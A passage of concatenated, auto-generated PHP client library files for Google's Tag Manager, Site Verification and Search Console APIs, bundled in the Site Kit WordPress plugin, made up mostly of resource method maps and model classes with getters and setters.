['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/zones', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'revert' => ['path' => 'tagmanager/v2/{+path}:revert', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_user_permissions = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsUserPermissions($this, $this->serviceName, 'user_permissions', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/user_permissions', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/user_permissions', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Client; /** * Service definition for SiteVerification (v1). * * <p> * Verifies ownership of websites or domains with Google.</p> * * <p> * For more information about this service, see the API * <a href="https://developers.google.com/site-verification/" target="_blank">Documentation</a> * </p> * * @author Google, Inc. */ class SiteVerification extends \Google\Site_Kit_Dependencies\Google\Service { /** Manage the list of sites and domains you control. */ const SITEVERIFICATION = "https://www.googleapis.com/auth/siteverification"; /** Manage your new site verifications with Google. */ const SITEVERIFICATION_VERIFY_ONLY = "https://www.googleapis.com/auth/siteverification.verify_only"; public $webResource; public $rootUrlTemplate; /** * Constructs the internal representation of the SiteVerification service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://www.googleapis.com/'; $this->rootUrlTemplate = $rootUrl ?: 'https://www.UNIVERSE_DOMAIN/'; $this->servicePath = 'siteVerification/v1/'; $this->batchPath = 'batch/siteVerification/v1'; $this->version = 'v1'; $this->serviceName = 'siteVerification'; $this->webResource = new \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\Resource\WebResource($this, $this->serviceName, 'webResource', ['methods' => ['delete' => ['path' => 'webResource/{id}', 'httpMethod' => 'DELETE', 'parameters' => ['id' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'webResource/{id}', 'httpMethod' => 'GET', 'parameters' => ['id' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'getToken' => ['path' => 'token', 'httpMethod' => 'POST', 'parameters' => []], 'insert' => ['path' => 'webResource', 'httpMethod' => 'POST', 'parameters' => ['verificationMethod' => ['location' => 'query', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'webResource', 'httpMethod' => 'GET', 'parameters' => []], 'patch' => ['path' => 'webResource/{id}', 'httpMethod' => 'PATCH', 'parameters' => ['id' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'update' => ['path' => 'webResource/{id}', 'httpMethod' => 'PUT', 'parameters' => ['id' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SiteVerification'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class AmpIssue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $issueMessage; /** * @var string */ public $severity; /** * @param string */ public function setIssueMessage($issueMessage) { $this->issueMessage = $issueMessage; } /** * @return string */ public function getIssueMessage() { return $this->issueMessage; } /** * @param string */ public function setSeverity($severity) { $this->severity = $severity; } /** * @return string */ public function getSeverity() { return $this->severity; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\AmpIssue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_AmpIssue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class Item extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'issues'; protected $issuesType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RichResultsIssue::class; protected $issuesDataType = 'array'; /** * @var string */ public $name; /** * @param RichResultsIssue[] */ public function setIssues($issues) { $this->issues = $issues; } /** * @return RichResultsIssue[] */ public function getIssues() { return $this->issues; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Item::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_Item'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class AmpInspectionResult extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'issues'; /** * @var string */ public $ampIndexStatusVerdict; /** * @var string */ public $ampUrl; /** * @var string */ public $indexingState; protected $issuesType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\AmpIssue::class; protected $issuesDataType = 'array'; /** * @var string */ public $lastCrawlTime; /** * @var string */ public $pageFetchState; /** * @var string */ public $robotsTxtState; /** * @var string */ public $verdict; /** * @param string */ public function setAmpIndexStatusVerdict($ampIndexStatusVerdict) { $this->ampIndexStatusVerdict = $ampIndexStatusVerdict; } /** * @return string */ public function getAmpIndexStatusVerdict() { return $this->ampIndexStatusVerdict; } /** * @param string */ public function setAmpUrl($ampUrl) { $this->ampUrl = $ampUrl; } /** * @return string */ public function getAmpUrl() { return $this->ampUrl; } /** * @param string */ public function setIndexingState($indexingState) { $this->indexingState = $indexingState; } /** * @return string */ public function getIndexingState() { return $this->indexingState; } /** * @param AmpIssue[] */ public function setIssues($issues) { $this->issues = $issues; } /** * @return AmpIssue[] */ public function getIssues() { return $this->issues; } /** * @param string */ public function setLastCrawlTime($lastCrawlTime) { $this->lastCrawlTime = $lastCrawlTime; } /** * @return string */ public function getLastCrawlTime() { return $this->lastCrawlTime; } /** * @param string */ public function setPageFetchState($pageFetchState) { $this->pageFetchState = $pageFetchState; } /** * @return string */ public function getPageFetchState() { return $this->pageFetchState; } /** * @param string */ public function setRobotsTxtState($robotsTxtState) { $this->robotsTxtState = $robotsTxtState; } /** * @return string */ public function getRobotsTxtState() { return $this->robotsTxtState; } /** * @param string */ public function setVerdict($verdict) { $this->verdict = $verdict; } /** * @return string */ public function getVerdict() { return $this->verdict; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\AmpInspectionResult::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_AmpInspectionResult'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class DetectedItems extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'items'; protected $itemsType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Item::class; protected $itemsDataType = 'array'; /** * @var string */ public $richResultType; /** * @param Item[] */ public function setItems($items) { $this->items = $items; } /** * @return Item[] */ public function getItems() { return $this->items; } /** * @param string */ public function setRichResultType($richResultType) { $this->richResultType = $richResultType; } /** * @return string */ public function getRichResultType() { return $this->richResultType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\DetectedItems::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_DetectedItems'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class ApiDimensionFilterGroup extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'filters'; protected $filtersType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\ApiDimensionFilter::class; protected $filtersDataType = 'array'; /** * @var string */ public $groupType; /** * @param ApiDimensionFilter[] */ public function setFilters($filters) { $this->filters = $filters; } /** * @return ApiDimensionFilter[] */ public function getFilters() { return $this->filters; } /** * @param string */ public function setGroupType($groupType) { $this->groupType = $groupType; } /** * @return string */ public function getGroupType() { return $this->groupType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\ApiDimensionFilterGroup::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_ApiDimensionFilterGroup'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class RichResultsIssue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $issueMessage; /** * @var string */ public $severity; /** * @param string */ public function setIssueMessage($issueMessage) { $this->issueMessage = $issueMessage; } /** * @return string */ public function getIssueMessage() { return $this->issueMessage; } /** * @param string */ public function setSeverity($severity) { $this->severity = $severity; } /** * @return string */ public function getSeverity() { return $this->severity; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RichResultsIssue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_RichResultsIssue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class MobileFriendlyIssue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $rule; /** * @param string */ public function setRule($rule) { $this->rule = $rule; } /** * @return string */ public function getRule() { return $this->rule; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\MobileFriendlyIssue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_MobileFriendlyIssue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class RunMobileFriendlyTestRequest extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $requestScreenshot; /** * @var string */ public $url; /** * @param bool */ public function setRequestScreenshot($requestScreenshot) { $this->requestScreenshot = $requestScreenshot; } /** * @return bool */ public function getRequestScreenshot() { return $this->requestScreenshot; } /** * @param string */ public function setUrl($url) { $this->url = $url; } /** * @return string */ public function getUrl() { return $this->url; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RunMobileFriendlyTestRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_RunMobileFriendlyTestRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class SitemapsListResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'sitemap'; protected $sitemapType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\WmxSitemap::class; protected $sitemapDataType = 'array'; /** * @param WmxSitemap[] */ public function setSitemap($sitemap) { $this->sitemap = $sitemap; } /** * @return WmxSitemap[] */ public function getSitemap() { return $this->sitemap; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SitemapsListResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_SitemapsListResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class TestStatus extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $details; /** * @var string */ public $status; /** * @param string */ public function setDetails($details) { $this->details = $details; } /** * @return string */ public function getDetails() { return $this->details; } /** * @param string */ public function setStatus($status) { $this->status = $status; } /** * @return string */ public function getStatus() { return $this->status; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\TestStatus::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_TestStatus'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class UrlInspectionResult extends \Google\Site_Kit_Dependencies\Google\Model { protected $ampResultType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\AmpInspectionResult::class; protected $ampResultDataType = ''; protected $indexStatusResultType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\IndexStatusInspectionResult::class; protected $indexStatusResultDataType = ''; /** * @var string */ public $inspectionResultLink; protected $mobileUsabilityResultType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\MobileUsabilityInspectionResult::class; protected $mobileUsabilityResultDataType = ''; protected $richResultsResultType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RichResultsInspectionResult::class; protected $richResultsResultDataType = ''; /** * @param AmpInspectionResult */ public function setAmpResult(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\AmpInspectionResult $ampResult) { $this->ampResult = $ampResult; } /** * @return AmpInspectionResult */ public function getAmpResult() { return $this->ampResult; } /** * @param IndexStatusInspectionResult */ public function setIndexStatusResult(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\IndexStatusInspectionResult $indexStatusResult) { $this->indexStatusResult = $indexStatusResult; } /** * @return IndexStatusInspectionResult */ public function getIndexStatusResult() { return $this->indexStatusResult; } /** * @param string */ public function setInspectionResultLink($inspectionResultLink) { $this->inspectionResultLink = $inspectionResultLink; } /** * @return string */ public function getInspectionResultLink() { return $this->inspectionResultLink; } /** * @param MobileUsabilityInspectionResult */ public function setMobileUsabilityResult(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\MobileUsabilityInspectionResult $mobileUsabilityResult) { $this->mobileUsabilityResult = $mobileUsabilityResult; } /** * @return MobileUsabilityInspectionResult */ public function getMobileUsabilityResult() { return $this->mobileUsabilityResult; } /** * @param RichResultsInspectionResult */ public function setRichResultsResult(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RichResultsInspectionResult $richResultsResult) { $this->richResultsResult = $richResultsResult; } /** * @return RichResultsInspectionResult */ public function getRichResultsResult() { return $this->richResultsResult; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\UrlInspectionResult::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_UrlInspectionResult'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class ApiDataRow extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'keys'; public $clicks; public $ctr; public $impressions; /** * @var string[] */ public $keys; public $position; public function setClicks($clicks) { $this->clicks = $clicks; } public function getClicks() { return $this->clicks; } public function setCtr($ctr) { $this->ctr = $ctr; } public function getCtr() { return $this->ctr; } public function setImpressions($impressions) { $this->impressions = $impressions; } public function getImpressions() { return $this->impressions; } /** * @param string[] */ public function setKeys($keys) { $this->keys = $keys; } /** * @return string[] */ public function getKeys() { return $this->keys; } public function setPosition($position) { $this->position = $position; } public function getPosition() { return $this->position; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\ApiDataRow::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_ApiDataRow'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class WmxSitemapContent extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $indexed; /** * @var string */ public $submitted; /** * @var string */ public $type; /** * @param string */ public function setIndexed($indexed) { $this->indexed = $indexed; } /** * @return string */ public function getIndexed() { return $this->indexed; } /** * @param string */ public function setSubmitted($submitted) { $this->submitted = $submitted; } /** * @return string */ public function getSubmitted() { return $this->submitted; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\WmxSitemapContent::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_WmxSitemapContent'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class InspectUrlIndexRequest extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $inspectionUrl; /** * @var string */ public $languageCode; /** * @var string */ public $siteUrl; /** * @param string */ public function setInspectionUrl($inspectionUrl) { $this->inspectionUrl = $inspectionUrl; } /** * @return string */ public function getInspectionUrl() { return $this->inspectionUrl; } /** * @param string */ public function setLanguageCode($languageCode) { $this->languageCode = $languageCode; } /** * @return string */ public function getLanguageCode() { return $this->languageCode; } /** * @param string */ public function setSiteUrl($siteUrl) { $this->siteUrl = $siteUrl; } /** * @return string */ public function getSiteUrl() { return $this->siteUrl; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\InspectUrlIndexRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_InspectUrlIndexRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class SearchAnalyticsQueryRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'dimensions'; /** * @var string */ public $aggregationType; /** * @var string */ public $dataState; protected $dimensionFilterGroupsType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\ApiDimensionFilterGroup::class; protected $dimensionFilterGroupsDataType = 'array'; /** * @var string[] */ public $dimensions; /** * @var string */ public $endDate; /** * @var int */ public $rowLimit; /** * @var string */ public $searchType; /** * @var string */ public $startDate; /** * @var int */ public $startRow; /** * @var string */ public $type; /** * @param string */ public function setAggregationType($aggregationType) { $this->aggregationType = $aggregationType; } /** * @return string */ public function getAggregationType() { return $this->aggregationType; } /** * @param string */ public function setDataState($dataState) { $this->dataState = $dataState; } /** * @return string */ public function getDataState() { return $this->dataState; } /** * @param ApiDimensionFilterGroup[] */ public function setDimensionFilterGroups($dimensionFilterGroups) { $this->dimensionFilterGroups = $dimensionFilterGroups; } /** * @return ApiDimensionFilterGroup[] */ public function getDimensionFilterGroups() { return $this->dimensionFilterGroups; } /** * @param string[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return string[] */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setEndDate($endDate) { $this->endDate = $endDate; } /** * @return string */ public function getEndDate() { return $this->endDate; } /** * @param int */ public function setRowLimit($rowLimit) { $this->rowLimit = $rowLimit; } /** * @return int */ public function getRowLimit() { return $this->rowLimit; } /** * @param string */ public function setSearchType($searchType) { $this->searchType = $searchType; } /** * @return string */ public function getSearchType() { return $this->searchType; } /** * @param string */ public function setStartDate($startDate) { $this->startDate = $startDate; } /** * @return string */ public function getStartDate() { return $this->startDate; } /** * @param int */ public function setStartRow($startRow) { $this->startRow = $startRow; } /** * @return int */ public function getStartRow() { return $this->startRow; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SearchAnalyticsQueryRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_SearchAnalyticsQueryRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class Image extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $data; /** * @var string */ public $mimeType; /** * @param string */ public function setData($data) { $this->data = $data; } /** * @return string */ public function getData() { return $this->data; } /** * @param string */ public function setMimeType($mimeType) { $this->mimeType = $mimeType; } /** * @return string */ public function getMimeType() { return $this->mimeType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Image::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_Image'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class SitesListResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'siteEntry'; protected $siteEntryType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\WmxSite::class; protected $siteEntryDataType = 'array'; /** * @param WmxSite[] */ public function setSiteEntry($siteEntry) { $this->siteEntry = $siteEntry; } /** * @return WmxSite[] */ public function getSiteEntry() { return $this->siteEntry; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SitesListResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_SitesListResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class BlockedResource extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $url; /** * @param string */ public function setUrl($url) { $this->url = $url; } /** * @return string */ public function getUrl() { return $this->url; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\BlockedResource::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_BlockedResource'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class MobileUsabilityInspectionResult 